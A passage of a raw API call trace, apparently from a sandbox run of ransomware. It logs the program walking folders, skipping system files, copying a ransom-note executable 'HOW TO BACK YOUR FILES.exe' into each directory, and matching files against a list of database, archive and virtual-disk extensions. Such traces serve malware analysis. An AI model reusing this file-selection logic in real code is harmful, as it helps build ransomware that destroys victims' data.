ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0077.287] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.287] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.287] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0077.287] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.287] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.287] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0077.287] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0077.287] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0077.287] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c1e5280, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0077.287] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0077.287] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0077.287] lstrcmpiW (lpString1="packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0077.287] lstrcmpiW (lpString1="packages", lpString2="aoldtz.exe") returned 1 [0077.287] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0077.287] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0077.287] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0077.287] lstrcmpiW (lpString1="packages", lpString2="bootmgr") returned 1 [0077.287] lstrcmpiW (lpString1="packages", lpString2="temp") returned -1 [0077.287] lstrcmpiW (lpString1="packages", lpString2="pagefile.sys") returned -1 [0077.287] lstrcmpiW (lpString1="packages", lpString2="boot") returned 1 [0077.287] lstrcmpiW (lpString1="packages", lpString2="ids.txt") returned 1 [0077.287] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0077.287] lstrcmpiW (lpString1="packages", lpString2="perflogs") returned -1 [0077.287] lstrcmpiW (lpString1="packages", lpString2="MSBuild") returned 1 [0077.287] lstrlenW (lpString="packages") returned 8 [0077.287] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*") returned 85 [0077.287] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="packages" | out: lpString1="packages") returned="packages" [0077.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0077.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xba) returned 0x318fc8 [0077.287] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d2248 [0077.287] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0077.287] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0077.288] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2268 [0077.288] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages" [0077.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x318fc8 | out: hHeap=0x2b0000) returned 1 [0077.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0077.288] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned 92 [0077.288] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages" [0077.288] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.288] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0077.288] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.288] GetLastError () returned 0x0 [0077.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0077.288] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0077.289] CloseHandle (hObject=0x120) returned 1 [0077.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0077.289] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.289] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0077.289] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.289] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.289] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0077.289] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.289] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.289] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0077.289] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0077.289] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0077.289] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c1e5280, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0077.289] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0077.289] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0077.289] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0077.289] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="aoldtz.exe") returned 1 [0077.289] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0077.289] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0077.289] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="windows") returned -1 [0077.289] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="bootmgr") returned 1 [0077.289] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="temp") returned 1 [0077.289] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="pagefile.sys") returned 1 [0077.289] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="boot") returned 1 [0077.289] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="ids.txt") returned 1 [0077.289] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="ntuser.dat") returned 1 [0077.289] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="perflogs") returned 1 [0077.289] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="MSBuild") returned 1 [0077.290] lstrlenW (lpString="vcRuntimeMinimum_amd64") returned 22 [0077.290] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*") returned 94 [0077.290] lstrcpyW (in: lpString1=0x2cce4ba, lpString2="vcRuntimeMinimum_amd64" | out: lpString1="vcRuntimeMinimum_amd64") returned="vcRuntimeMinimum_amd64" [0077.290] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0077.290] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe8) returned 0x2c8eb8 [0077.290] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d2248 [0077.290] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0077.290] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0077.290] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2268 [0077.290] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64" [0077.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0077.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0077.290] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned 115 [0077.290] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64" [0077.290] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.290] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0077.291] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.291] GetLastError () returned 0x0 [0077.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0077.291] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0077.291] CloseHandle (hObject=0x120) returned 1 [0077.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0077.291] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.291] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0077.291] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.291] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.291] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0077.291] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.291] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.291] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0077.291] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0077.291] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0077.291] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3c0e500, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xd3c0e500, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xd3c0e500, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x165257, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0077.291] lstrcmpiW (lpString1="cab1.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.291] lstrcmpiW (lpString1="cab1.cab", lpString2="aoldtz.exe") returned 1 [0077.291] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2="bootmgr") returned 1 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2="temp") returned -1 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2="pagefile.sys") returned -1 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2="boot") returned 1 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2="ids.txt") returned -1 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2="perflogs") returned -1 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2="MSBuild") returned -1 [0077.292] lstrlenW (lpString="cab1.cab") returned 8 [0077.292] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*") returned 117 [0077.292] lstrcpyW (in: lpString1=0x2cce4e8, lpString2="cab1.cab" | out: lpString1="cab1.cab") returned="cab1.cab" [0077.292] lstrlenW (lpString="cab1.cab") returned 8 [0077.292] lstrlenW (lpString="Ares865") returned 7 [0077.292] lstrcmpiW (lpString1="ab1.cab", lpString2="Ares865") returned -1 [0077.292] lstrlenW (lpString=".dll") returned 4 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2=".dll") returned 1 [0077.292] lstrlenW (lpString=".lnk") returned 4 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2=".lnk") returned 1 [0077.292] lstrlenW (lpString=".ini") returned 4 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2=".ini") returned 1 [0077.292] lstrlenW (lpString=".sys") returned 4 [0077.292] lstrcmpiW (lpString1="cab1.cab", lpString2=".sys") returned 1 [0077.292] lstrlenW (lpString="cab1.cab") returned 8 [0077.292] lstrlenW (lpString="bak") returned 3 [0077.292] lstrcmpiW (lpString1="cab", lpString2="bak") returned 1 [0077.292] lstrlenW (lpString="ba_") returned 3 [0077.292] lstrcmpiW (lpString1="cab", lpString2="ba_") returned 1 [0077.292] lstrlenW (lpString="dbb") returned 3 [0077.292] lstrcmpiW (lpString1="cab", lpString2="dbb") returned -1 [0077.292] lstrlenW (lpString="vmdk") returned 4 [0077.292] lstrcmpiW (lpString1=".cab", lpString2="vmdk") returned -1 [0077.292] lstrlenW (lpString="rar") returned 3 [0077.292] lstrcmpiW (lpString1="cab", lpString2="rar") returned -1 [0077.293] lstrlenW (lpString="zip") returned 3 [0077.293] lstrcmpiW (lpString1="cab", lpString2="zip") returned -1 [0077.293] lstrlenW (lpString="tgz") returned 3 [0077.293] lstrcmpiW (lpString1="cab", lpString2="tgz") returned -1 [0077.293] lstrlenW (lpString="vbox") returned 4 [0077.293] lstrcmpiW (lpString1=".cab", lpString2="vbox") returned -1 [0077.293] lstrlenW (lpString="vdi") returned 3 [0077.293] lstrcmpiW (lpString1="cab", lpString2="vdi") returned -1 [0077.293] lstrlenW (lpString="vhd") returned 3 [0077.293] lstrcmpiW (lpString1="cab", lpString2="vhd") returned -1 [0077.293] lstrlenW (lpString="vhdx") returned 4 [0077.293] lstrcmpiW (lpString1=".cab", lpString2="vhdx") returned -1 [0077.293] lstrlenW (lpString="avhd") returned 4 [0077.293] lstrcmpiW (lpString1=".cab", lpString2="avhd") returned -1 [0077.293] lstrlenW (lpString="db") returned 2 [0077.293] lstrcmpiW (lpString1="ab", lpString2="db") returned -1 [0077.293] lstrlenW (lpString="db2") returned 3 [0077.293] lstrcmpiW (lpString1="cab", lpString2="db2") returned -1 [0077.293] lstrlenW (lpString="db3") returned 3 [0077.293] lstrcmpiW (lpString1="cab", lpString2="db3") returned -1 [0077.293] lstrlenW (lpString="dbf") returned 3 [0077.293] lstrcmpiW (lpString1="cab", lpString2="dbf") returned -1 [0077.293] lstrlenW (lpString="mdf") returned 3 [0077.293] lstrcmpiW (lpString1="cab", lpString2="mdf") returned -1 [0077.293] lstrlenW (lpString="mdb") returned 3 [0077.293] lstrcmpiW (lpString1="cab", lpString2="mdb") returned -1 [0077.293] lstrlenW (lpString="sql") returned 3 [0077.293] lstrcmpiW (lpString1="cab", lpString2="sql") returned -1 [0077.293] lstrlenW (lpString="sqlite") returned 6 [0077.293] lstrcmpiW (lpString1="b1.cab", lpString2="sqlite") returned -1 [0077.293] lstrlenW (lpString="sqlite3") returned 7 [0077.293] lstrcmpiW (lpString1="ab1.cab", lpString2="sqlite3") returned -1 [0077.293] lstrlenW (lpString="sqlitedb") returned 8 [0077.293] lstrlenW (lpString="xml") returned 3 [0077.293] lstrcmpiW (lpString1="cab", lpString2="xml") returned -1 [0077.293] lstrlenW (lpString="$er") returned 3 [0077.293] lstrcmpiW (lpString1="cab", lpString2="$er") returned 1 [0077.293] lstrlenW (lpString="4dd") returned 3 [0077.294] lstrcmpiW (lpString1="cab", lpString2="4dd") returned 1 [0077.294] lstrlenW (lpString="4dl") returned 3 [0077.294] lstrcmpiW (lpString1="cab", lpString2="4dl") returned 1 [0077.294] lstrlenW (lpString="^^^") returned 3 [0077.294] lstrcmpiW (lpString1="cab", lpString2="^^^") returned 1 [0077.294] lstrlenW (lpString="abs") returned 3 [0077.294] lstrcmpiW (lpString1="cab", lpString2="abs") returned 1 [0077.294] lstrlenW (lpString="abx") returned 3 [0077.294] lstrcmpiW (lpString1="cab", lpString2="abx") returned 1 [0077.294] lstrlenW (lpString="accdb") returned 5 [0077.294] lstrcmpiW (lpString1="1.cab", lpString2="accdb") returned -1 [0077.294] lstrlenW (lpString="accdc") returned 5 [0077.294] lstrcmpiW (lpString1="1.cab", lpString2="accdc") returned -1 [0077.294] lstrlenW (lpString="accde") returned 5 [0077.294] lstrcmpiW (lpString1="1.cab", lpString2="accde") returned -1 [0077.294] lstrlenW (lpString="accdr") returned 5 [0077.294] lstrcmpiW (lpString1="1.cab", lpString2="accdr") returned -1 [0077.294] lstrlenW (lpString="accdt") returned 5 [0077.294] lstrcmpiW (lpString1="1.cab", lpString2="accdt") returned -1 [0077.294] lstrlenW (lpString="accdw") returned 5 [0077.294] lstrcmpiW (lpString1="1.cab", lpString2="accdw") returned -1 [0077.294] lstrlenW (lpString="accft") returned 5 [0077.294] lstrcmpiW (lpString1="1.cab", lpString2="accft") returned -1 [0077.294] lstrlenW (lpString="adb") returned 3 [0077.294] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0077.294] lstrlenW (lpString="adb") returned 3 [0077.294] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0077.294] lstrlenW (lpString="ade") returned 3 [0077.294] lstrcmpiW (lpString1="cab", lpString2="ade") returned 1 [0077.294] lstrlenW (lpString="adf") returned 3 [0077.294] lstrcmpiW (lpString1="cab", lpString2="adf") returned 1 [0077.294] lstrlenW (lpString="adn") returned 3 [0077.294] lstrcmpiW (lpString1="cab", lpString2="adn") returned 1 [0077.294] lstrlenW (lpString="adp") returned 3 [0077.294] lstrcmpiW (lpString1="cab", lpString2="adp") returned 1 [0077.294] lstrlenW (lpString="alf") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="alf") returned 1 [0077.295] lstrlenW (lpString="ask") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="ask") returned 1 [0077.295] lstrlenW (lpString="btr") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="btr") returned 1 [0077.295] lstrlenW (lpString="cat") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="cat") returned -1 [0077.295] lstrlenW (lpString="cdb") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="cdb") returned -1 [0077.295] lstrlenW (lpString="ckp") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="ckp") returned -1 [0077.295] lstrlenW (lpString="cma") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="cma") returned -1 [0077.295] lstrlenW (lpString="cpd") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="cpd") returned -1 